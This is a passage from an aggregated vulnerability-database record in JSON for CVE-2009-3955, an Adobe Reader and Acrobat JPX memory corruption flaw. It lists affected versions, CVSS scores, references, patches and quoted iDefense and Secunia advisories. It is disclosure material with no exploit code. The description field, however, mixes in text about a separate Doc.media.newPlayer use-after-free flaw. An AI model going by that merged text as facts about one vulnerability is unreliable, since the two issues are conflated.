            "vendor": "adobe",
            "version": "4.0.5"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.0.7"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "5.0.10"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "6.0.3"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "8.1.3"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "9.2"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.0.3"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "6.0.4"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "8.1.2"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.0.2"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.1.2"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.1.3"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.0.6"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "5.0.9"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "8.1.7"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "8.1.1"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.0.5"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.1.4"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.0.4"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.1.1"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "7.0.3"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "acrobat reader",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "5.0.7"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "adobe",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "adobe",
            "version": null
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "adobe",
            "version": "8.2"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "adobe",
            "version": "9.3"
          },
          {
            "_id": null,
            "model": "reader",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "adobe",
            "version": "8.2"
          },
          {
            "_id": null,
            "model": "reader",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "adobe",
            "version": "9.3"
          },
          {
            "_id": null,
            "model": "enterprise linux extras",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "3 extras"
          },
          {
            "_id": null,
            "model": "enterprise linux extras",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "4 extras"
          },
          {
            "_id": null,
            "model": "enterprise linux extras",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "4.8.z extras"
          },
          {
            "_id": null,
            "model": "rhel desktop supplementary",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "5 (client)"
          },
          {
            "_id": null,
            "model": "rhel supplementary",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "5 (server)"
          },
          {
            "_id": null,
            "model": "rhel supplementary eus",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "5.4.z (server)"
          },
          {
            "_id": null,
            "model": "linux enterprise desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "11"
          },
          {
            "_id": null,
            "model": "linux enterprise sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "_id": null,
            "model": "linux enterprise sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "_id": null,
            "model": "opensuse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "11.2"
          },
          {
            "_id": null,
            "model": "opensuse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "11.1"
          },
          {
            "_id": null,
            "model": "opensuse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "11.0"
          },
          {
            "_id": null,
            "model": "enterprise linux ws extras",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "_id": null,
            "model": "enterprise linux ws extras",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "_id": null,
            "model": "enterprise linux extras",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "_id": null,
            "model": "enterprise linux extras",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "_id": null,
            "model": "enterprise linux es extras",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "_id": null,
            "model": "enterprise linux es extras",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "_id": null,
            "model": "enterprise linux as extras",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "_id": null,
            "model": "enterprise linux as extras",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "_id": null,
            "model": "desktop extras",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "_id": null,
            "model": "desktop extras",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "_id": null,
            "model": "hat enterprise linux supplementary server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "5"
          },
          {
            "_id": null,
            "model": "hat enterprise linux desktop supplementary client",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "5"
          },
          {
            "_id": null,
            "model": "networks self-service speech server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "_id": null,
            "model": "networks self-service peri application",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "_id": null,
            "model": "networks self-service mps",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "5000"
          },
          {
            "_id": null,
            "model": "networks self-service mps",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "10000"
          },
          {
            "_id": null,
            "model": "networks self-service media processing server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "_id": null,
            "model": "networks callpilot 703t",
            "scope": null,
            "trust": 0.3,
            "vendor": "nortel",
            "version": null
          },
          {
            "_id": null,
            "model": "networks callpilot 600r",
            "scope": null,
            "trust": 0.3,
            "vendor": "nortel",
            "version": null
          },
          {
            "_id": null,
            "model": "networks callpilot 201i",
            "scope": null,
            "trust": 0.3,
            "vendor": "nortel",
            "version": null
          },
          {
            "_id": null,
            "model": "networks callpilot 200i",
            "scope": null,
            "trust": 0.3,
            "vendor": "nortel",
            "version": null
          },
          {
            "_id": null,
            "model": "networks callpilot 1005r",
            "scope": null,
            "trust": 0.3,
            "vendor": "nortel",
            "version": null
          },
          {
            "_id": null,
            "model": "networks callpilot 1002rp",
            "scope": null,
            "trust": 0.3,
            "vendor": "nortel",
            "version": null
          },
          {
            "_id": null,
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "9.1.3"
          },
          {
            "_id": null,
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "9.1.2"
          },
          {
            "_id": null,
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "9.1.1"
          },
          {
            "_id": null,
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.7"
          },
          {
            "_id": null,
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.6"
          },
          {
            "_id": null,
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.5"
          },
          {
            "_id": null,
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.4"
          },
          {
            "_id": null,
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.3"
          },
          {
            "_id": null,
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.2"
          },
          {
            "_id": null,
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.1"
          },
          {
            "_id": null,
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "7.0.9"
          },
          {
            "_id": null,
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "6.0.1"
          },
          {
            "_id": null,
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "9.2"
          },
          {
            "_id": null,
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "9"
          },
          {
            "_id": null,
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1"
          },
          {
            "_id": null,
            "model": "reader",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "acrobat standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "9.1.3"
          },
          {
            "_id": null,
            "model": "acrobat standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "9.1.2"
          },
          {
            "_id": null,
            "model": "acrobat standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.7"
          },
          {
            "_id": null,
            "model": "acrobat standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.6"
          },
          {
            "_id": null,
            "model": "acrobat standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.4"
          },
          {
            "_id": null,
            "model": "acrobat standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.3"
          },
          {
            "_id": null,
            "model": "acrobat standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.2"
          },
          {
            "_id": null,
            "model": "acrobat standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.1"
          },
          {
            "_id": null,
            "model": "acrobat standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "9.2"
          },
          {
            "_id": null,
            "model": "acrobat standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "acrobat standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "9"
          },
          {
            "_id": null,
            "model": "acrobat standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1"
          },
          {
            "_id": null,
            "model": "acrobat standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "acrobat professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "9.1.3"
          },
          {
            "_id": null,
            "model": "acrobat professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "9.1.2"
          },
          {
            "_id": null,
            "model": "acrobat professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.7"
          },
          {
            "_id": null,
            "model": "acrobat professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.6"
          },
          {
            "_id": null,
            "model": "acrobat professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.4"
          },
          {
            "_id": null,
            "model": "acrobat professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.3"
          },
          {
            "_id": null,
            "model": "acrobat professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.2"
          },
          {
            "_id": null,
            "model": "acrobat professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1.1"
          },
          {
            "_id": null,
            "model": "acrobat professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "9.2"
          },
          {
            "_id": null,
            "model": "acrobat professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "acrobat professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "9"
          },
          {
            "_id": null,
            "model": "acrobat professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.1"
          },
          {
            "_id": null,
            "model": "acrobat professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "9.2"
          },
          {
            "_id": null,
            "model": "reader",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "9.3"
          },
          {
            "_id": null,
            "model": "reader",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.2"
          },
          {
            "_id": null,
            "model": "acrobat standard",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "9.3"
          },
          {
            "_id": null,
            "model": "acrobat standard",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.2"
          },
          {
            "_id": null,
            "model": "acrobat professional",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "9.3"
          },
          {
            "_id": null,
            "model": "acrobat professional",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "8.2"
          },
          {
            "_id": null,
            "model": "acrobat",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "adobe",
            "version": "9.3"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#508357"
          },
          {
            "db": "BID",
            "id": "37757"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201001-089"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2010-001016"
          },
          {
            "db": "NVD",
            "id": "CVE-2009-3955"
          }
        ]
      },
      "configurations": {
        "_id": null,
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:adobe:acrobat",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:adobe:acrobat_reader",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:redhat:enterprise_linux",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:redhat:rhel_desktop_supplementary",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:redhat:rhel_supplementary",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:redhat:rhel_supplementary_eus",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2010-001016"
          }
        ]
      },
      "credits": {
        "_id": null,
        "data": "Code Audit Labs\u203bhttp://www.vulnhunt.com",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201001-089"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2009-3955",
      "cvss": {
        "_id": null,
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2009-3955",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "VHN-41401",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2009-3955",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#508357",
                "trust": 0.8,
                "value": "65.84"
              },
              {
                "author": "NVD",
                "id": "CVE-2009-3955",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201001-089",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-41401",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#508357"
          },
          {
            "db": "VULHUB",
            "id": "VHN-41401"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201001-089"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2010-001016"
          },
          {
            "db": "NVD",
            "id": "CVE-2009-3955"
          }
        ]
      },
      "description": {
        "_id": null,
        "data": "Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, allows remote attackers to execute arbitrary code via a crafted JPC_MS_RGN marker in the Jp2c stream of a JpxDecode encoded data stream, which triggers an integer sign extension that bypasses a sanity check, leading to memory corruption. The Doc.media.newPlayer method in Adobe Acrobat and Reader contains a use-after-free vulnerability, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system. Adobe Reader and Acrobat are prone to a memory-corruption vulnerability. \nAn attacker can exploit this issue to execute arbitrary code. Failed exploit attempts will likely cause denial-of-service conditions. \nThis issue affects Reader and Acrobat 9.2 and prior versions. \nNOTE: This issue was previously covered in BID 37667 (Adobe Acrobat and Reader January 2010 Multiple Remote Vulnerabilities), but has been given its own record to better document it. iDefense Security Advisory 01.12.10\nhttp://labs.idefense.com/intelligence/vulnerabilities/\nJan 12, 2010\n\nI. For more information, please visit following pages:\n\nhttp://www.adobe.com/products/reader/\nhttp://www.adobe.com/products/acrobat/\n\nII. \n\nThe vulnerability occurs when processing the Jp2c stream of a JpxDecode\nencoded data stream within a PDF file. During the processing of a\nJPC_MS_RGN marker, an integer sign extension may cause a bounds check\nto be bypassed. This results in an exploitable memory corruption\nvulnerability. \n\nIII. The\nattacker will have to create a malicious PDF file and convince the\nvictim to open it. This can be accomplished by embedding the PDF file\ninto an IFrame inside of a Web page, which will result in automatic\nexploitation once the page is viewed. The file could also be e-mailed\nas an attachment or placed on a file share. In these cases, a user\nwould have to manually open the file to trigger exploitation. If\npreview is enabled in Windows Explorer, Acrobat will try to generate a\npreview for PDF files when a folder containing PDF files is accessed,\nthus triggering the exploitation. \n\nIV. DETECTION\n\niDefense has confirmed the existence of this vulnerability in latest\nversion of Adobe Reader, at the time of testing, version 9.1.0. \nPrevious versions may also be affected. \n\nAdobe has stated that all 9.2 and below versions, as well as all 8.1.7\nand below versions are vulnerable. \n\nV. WORKAROUND\n\nNone of the following workarounds will prevent exploitation, but they\ncan reduce potential attack vectors and make exploitation more\ndifficult. \n\nPrevent PDF documents from being opened automatically by the Web browser\nDisable JavaScript\nDisable PDFShell extension by removing or renaming the Acrord32info.exe file\n\nVI. VENDOR RESPONSE\n\nAdobe has released a patch which addresses this issue. Information about\ndownloadable vendor updates can be found by clicking on the URLs shown. \n\nhttp://www.adobe.com/support/security/bulletins/apsb10-02.html\n\nVII. CVE INFORMATION\n\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\nname CVE-2009-3955 to this issue. This is a candidate for inclusion in\nthe CVE list (http://cve.mitre.org/), which standardizes names for\nsecurity problems. \n\nVIII. DISCLOSURE TIMELINE\n\n08/06/2009  Initial Contact\n08/06/2009  Initial Response\n09/16/2009  Vendor requested POC. iDefense sent POC. \n09/17/2009  Vendor response. \n01/12/2010  Coordinated public disclosure. \n\nIX. CREDIT\n\nThis vulnerability was reported to iDefense by \tCode Audit Labs\nhttp://www.vulnhunt.com. \n\nGet paid for vulnerability research\nhttp://labs.idefense.com/methodology/vulnerability/vcp.php\n\nFree tools, research and upcoming events\nhttp://labs.idefense.com/\n\nX. LEGAL NOTICES\n\nCopyright \\xa9 2010 iDefense, Inc. \n\nPermission is granted for the redistribution of this alert\nelectronically. It may not be edited in any way without the express\nwritten consent of iDefense. If you wish to reprint the whole or any\npart of this alert in any other medium other than electronically,\nplease e-mail customerservice@idefense.com for permission. \n\nDisclaimer: The information in the advisory is believed to be accurate\nat the time of publishing based on currently available information. Use\nof the information constitutes acceptance for use in an AS IS condition. \n There are no warranties with regard to this information. Neither the\nauthor nor the publisher accepts any liability for any direct,\nindirect, or consequential loss or damage arising from use of, or\nreliance on, this information. ----------------------------------------------------------------------\n\nDo you have VARM strategy implemented?\n\n(Vulnerability Assessment Remediation Management)  \n\nIf not, then implement it through the most reliable vulnerability\nintelligence source on the market. \n\nImplement it through Secunia. \n\nFor more information visit:\nhttp://secunia.com/advisories/business_solutions/\n\nAlternatively request a call from a Secunia representative today to\ndiscuss how we can help you with our capabilities contact us at:\nsales@secunia.com\n\n----------------------------------------------------------------------\n\nTITLE:\nAdobe Reader/Acrobat Code Execution Vulnerability\n\nSECUNIA ADVISORY ID:\nSA37690\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/37690/\n\nDESCRIPTION:\nA vulnerability has been reported in Adobe Reader and Acrobat, which\ncan be exploited by malicious people to compromise a user\u0027s system. \n\nNOTE: This vulnerability is currently being actively exploited. \n\nSOLUTION:\nDo not open untrusted PDF files. \n\nDo not visit untrusted websites or follow untrusted links. \n\nPROVIDED AND/OR DISCOVERED BY:\nReported as a 0-day. \n\nORIGINAL ADVISORY:\nhttp://blogs.adobe.com/psirt/2009/12/new_adobe_reader_and_acrobat_v.html\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2009-3955"
          },
          {
            "db": "CERT/CC",
            "id": "VU#508357"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2010-001016"
          },
          {
            "db": "BID",
            "id": "37757"
          },
          {
            "db": "VULHUB",
            "id": "VHN-41401"
          },
          {
            "db": "PACKETSTORM",
            "id": "85088"
          },
          {
            "db": "PACKETSTORM",
            "id": "83870"
          }
        ],
        "trust": 2.88
      },
      "exploit_availability": {
        "_id": null,
        "data": [
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-41401",
            "trust": 0.1,
            "type": "unknown"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-41401"
          }
        ]
      },
      "external_ids": {
        "_id": null,
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2009-3955",
            "trust": 2.9
          },
          {
            "db": "BID",
            "id": "37757",
            "trust": 2.8
          },
          {
            "db": "VUPEN",
            "id": "ADV-2010-0103",
            "trust": 2.5
          },
          {
            "db": "SECTRACK",
            "id": "1023446",
            "trust": 2.5
          },
          {
            "db": "USCERT",
            "id": "TA10-013A",
            "trust": 2.5
          },
          {
            "db": "XF",
            "id": "55553",
            "trust": 1.4
          },
          {
            "db": "SECUNIA",
            "id": "38215",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "38138",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "37690",
            "trust": 0.9
          },
          {
            "db": "OSVDB",
            "id": "60980",
            "trust": 0.8
          },
          {
            "db": "CERT/CC",
            "id": "VU#508357",
            "trust": 0.8
          },
          {
            "db": "USCERT",
            "id": "SA10-013A",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2010-001016",
            "trust": 0.8
          },
          {
            "db": "IDEFENSE",
            "id": "20100113 ADOBE READER AND ACROBAT JPXDECODE MEMORY CORRUPTION VULNERABILITY",
            "trust": 0.6
          },
          {
            "db": "CERT/CC",
            "id": "TA10-013A",
            "trust": 0.6
          },
          {
            "db": "SUSE",
            "id": "SUSE-SA:2010:008",
            "trust": 0.6
          },
          {
            "db": "NSFOCUS",
            "id": "14341",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201001-089",
            "trust": 0.6
          },
          {
            "db": "PACKETSTORM",
            "id": "85088",
            "trust": 0.2
          },
          {
            "db": "VULHUB",
            "id": "VHN-41401",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "83870",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#508357"
          },
          {
            "db": "VULHUB",
            "id": "VHN-41401"
          },
          {
            "db": "BID",
            "id": "37757"
          },
          {
            "db": "PACKETSTORM",
            "id": "85088"
          },
          {
            "db": "PACKETSTORM",
            "id": "83870"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201001-089"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2010-001016"
          },
          {
            "db": "NVD",
            "id": "CVE-2009-3955"
          }
        ]
      },
      "id": "VAR-200912-0751",
      "iot": {
        "_id": null,
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-41401"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2026-04-10T23:16:47.736000Z",
      "patch": {
        "_id": null,
        "data": [
          {
            "title": "APSB10-02",
            "trust": 0.8,
            "url": "http://www.adobe.com/support/security/bulletins/apsb10-02.html"
          },
          {
            "title": "APSB10-02",
            "trust": 0.8,
            "url": "http://www.adobe.com/jp/support/security/bulletins/apsb10-02.html"
          },
          {
            "title": "RHSA-2010:0037",
            "trust": 0.8,
            "url": "https://rhn.redhat.com/errata/RHSA-2010-0037.html"
          },
          {
            "title": "RHSA-2010:0038",
            "trust": 0.8,
            "url": "https://rhn.redhat.com/errata/RHSA-2010-0038.html"
          },
          {
            "title": "RHSA-2010:0060",
            "trust": 0.8,
            "url": "https://rhn.redhat.com/errata/RHSA-2010-0060.html"
          },
          {
            "title": "TA10-013A",
            "trust": 0.8,
            "url": "http://software.fujitsu.com/jp/security/vulnerabilities/ta10-013a.html"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2010-001016"
          }
        ]
      },
      "problemtype_data": {
        "_id": null,
        "data": [
          {
            "problemtype": "CWE-399",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-41401"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2010-001016"
          },
          {
            "db": "NVD",
            "id": "CVE-2009-3955"
          }
